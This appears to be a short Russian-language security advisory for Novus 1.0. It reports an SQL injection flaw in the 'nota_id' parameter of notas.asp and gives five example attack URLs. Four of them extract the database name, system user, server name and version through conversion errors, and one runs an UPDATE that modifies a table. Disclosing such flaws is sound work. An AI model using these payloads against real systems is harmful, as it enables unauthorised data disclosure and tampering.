Программа: Novus 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре «nota_id»
сценарием notas.asp. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Примеры:

http://[novus]/notas.asp?nota_id=1+and+1=convert(int,db_name())
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,system_user)
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@servername)—
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@version)—
http://[novus]/notas.asp?nota_id=0update+a_nota+set+titulo+=+’Novus Bug Sql
Inyection’—



Оставить мнение